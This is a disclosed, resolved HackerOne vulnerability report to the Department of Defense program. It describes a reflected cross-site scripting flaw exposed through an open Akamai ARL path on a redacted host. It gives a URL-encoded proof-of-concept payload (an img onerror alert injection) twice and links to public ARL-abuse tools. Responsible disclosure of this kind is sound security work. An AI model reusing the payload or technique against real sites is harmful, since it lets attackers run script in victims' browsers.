Open Akamai ARL XSS at ████████

Disclosed: 2022-04-07 19:54:34 By whoisbinit To deptofdefense
Medium
Vulnerability Details
## Summary There is Open Akamai ARL XSS at ████ ## Proof-of-Concept https://█████████/7/0/33/1d/www.citysearch.com/search?what=Binit&where=Binit%22%3E%3Cimg%20src%3Dbinit%20onerror%3Dalert%28document.domain%29%3E ## References: - https://github.com/war-and-code/akamai-arl-hack - https://twitter.com/SpiderSec/status/1421176297548435459 - https://warandcode.com/post/akamai-arl-hack/ - https://github.com/cybercdh/goarl - https://community.akamai.com/customers/s/article/WebPerformanceV1V2ARLChangeStartingFebruary282021?language=en_US ## Impact Attackers can execute malicious JavaScript code in the target webpage. ## System Host(s) ███ ## Affected Product(s) and Version(s) ## CVE Numbers ## Steps to Reproduce https://██████/7/0/33/1d/www.citysearch.com/search?what=Binit&where=Binit%22%3E%3Cimg%20src%3Dbinit%20onerror%3Dalert%28document.domain%29%3E ## Suggested Mitigation/Remediation Actions Visit - https://community.akamai.com/customers/s/article/WebPerformanceV1V2ARLChangeStartingFebruary282021?language=en_US
Actions
View on HackerOne
Report Stats
  • Report ID: 1317031
  • State: Closed
  • Substate: resolved
  • Upvotes: 8
Share this report